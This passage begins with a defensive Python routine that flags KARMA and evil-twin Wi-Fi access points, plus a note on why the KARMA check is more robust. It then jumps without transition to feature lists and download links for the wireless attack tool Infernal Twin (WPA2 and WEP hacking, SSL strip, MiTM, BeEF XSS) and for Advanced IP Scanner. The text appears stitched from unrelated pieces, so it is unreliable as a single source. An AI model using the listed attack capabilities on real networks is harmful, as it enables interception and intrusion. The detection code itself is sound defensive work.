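    """Return {'karma_suspects': {bssid: [ssids]}, 'evil_twins': [(ssid, bssid)]}."""
    ssids_by_bssid = defaultdict(set)
    for f in frames:
        if f["type"] in ("beacon", "probe_resp"):
            ssids_by_bssid[f["bssid"]].add(f["ssid"])

    # KARMA/MANA: one radio claiming to be every network anyone probes for. A normal AP answers
    # probes only for the SSIDs it is configured to serve.
    karma_suspects = {b: sorted(s) for b, s in ssids_by_bssid.items() if len(s) >= karma_threshold}

    # Evil twin: a managed SSID advertised by a BSSID that is not in the inventory. The KARMA AP
    # shows up here too, since CorpWiFi is one of the names it impersonated.
    evil_twins = sorted(
        (ssid, bssid)
        for bssid, ssids in ssids_by_bssid.items()
        for ssid in ssids
        if ssid in known_aps and bssid not in known_aps[ssid]
    )
    return {"karma_suspects": karma_suspects, "evil_twins": evil_twins}


if __name__ == "__main__":
    for kind, items in analyse(OBSERVED_FRAMES, KNOWN_APS).items():
        print(kind, items)
```

The KARMA check is the more robust of the two: an evil twin can spoof the BSSID as well as the SSID and slip past an inventory match, but an AP that replies to probes for HomeNet, Starbucks and CorpWiFi alike cannot hide what it is doing from a sensor that watches probe responses.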


Features

  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report Generation
    • PDF Report
    • HTML Report
  • Note Taking
  • Data saved in Database
  • Network mapping
  • MiTM
  • Probe Request

Latest Changes

  • Added Log retrieval button for various attack results.
  • Added BeEF XSS framework integration
  • Added HTTP Traffic View within tool
  • Improved Infernal Wireless Attack
  • Improved the visual view of some of the panels
  • Improved Basic Authentication during Social engineering assessment over wireless network

You can download Infernal Twin here:

infernal-2.6.11.zip

Or read more here.


Advanced IP Scanner – Fast Lightweight Free Windows Port Scanner

Advanced IP Scanner is a reliable and free Windows port scanner to analyse members of a LAN. The program shows all network devices, gives you access to shared folders, provides remote control of computers (via RDP and Radmin), and can even remotely switch computers off.

Advanced IP Scanner - Fast Lightweight Free Windows Port Scanner

It is easy to use and runs as a portable edition. Advanced IP Scanner has proven itself through the years as a reliable and helpful tool to manage LAN and perform a wide range of networking tasks. Each new version is rigorously tested by Famatech and beta-testers from around the world. The company considers all recommendations on product improvement in order to create the best possible solution for customers.


Features

  • Easy access to network shares
  • Remote control via RDP and Radmin
  • MAC addresses detection
  • Switching on/off computers remotely
  • Export scan results to CSV
  • No installation required
  • Windows 10 Compatible

You can download Advanced IP Scanner here:

ipscan24.exe

Or read more here.

